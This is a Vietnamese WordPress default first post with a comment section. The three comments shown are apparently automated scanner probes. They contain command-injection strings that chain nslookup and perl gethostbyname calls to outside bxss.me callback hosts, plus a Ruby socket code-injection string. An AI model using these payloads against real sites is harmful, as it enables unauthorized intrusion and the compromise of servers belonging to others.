Chào tất cả mọi người!

Cảm ơn vì đã sử dụng WordPress. Đây là bài viết đầu tiên của bạn. Sửa hoặc xóa nó, và bắt đầu bài viết của bạn nhé!

97 replies
 1. 1
  1 says:

  &(nslookup hitviyewibnef85153.bxss.me||perl -e “gethostbyname(‘hitviyewibnef85153.bxss.me’)”)&’\”`0&(nslookup hitviyewibnef85153.bxss.me||perl -e “gethostbyname(‘hitviyewibnef85153.bxss.me’)”)&`’

 2. 1
  1 says:

  ;(nslookup hitbtmpuzalen9bcc5.bxss.me||perl -e “gethostbyname(‘hitbtmpuzalen9bcc5.bxss.me’)”)|(nslookup hitbtmpuzalen9bcc5.bxss.me||perl -e “gethostbyname(‘hitbtmpuzalen9bcc5.bxss.me’)”)&(nslookup hitbtmpuzalen9bcc5.bxss.me||perl -e “gethostbyname(‘hitbtmpuzalen9bcc5.bxss.me’)”)

 3. 1
  1 says:

  “+”A”.concat(70-3).concat(22*4).concat(113).concat(77).concat(119).concat(71)+(require”socket”
  Socket.gethostbyname(“hithl”+”bqmynwvjece49.bxss.me.”)[3].to_s)+”

Leave a Reply

Want to join the discussion?
Feel free to contribute!

Trả lời

Email của bạn sẽ không được hiển thị công khai.